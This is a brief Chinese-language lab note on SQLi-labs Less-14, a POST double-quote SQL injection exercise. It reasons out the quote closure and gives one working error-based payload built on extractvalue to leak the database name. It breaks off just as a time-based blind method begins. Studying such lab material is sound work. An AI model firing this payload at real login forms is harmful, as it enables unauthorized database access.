Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)
在password输入"会报错 "#就不报错了 那么应该是“”的闭合
但是没有回显的值 只有报错的信息,只能盲注
方法一,报错型
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit
方法二,时间型盲注
uname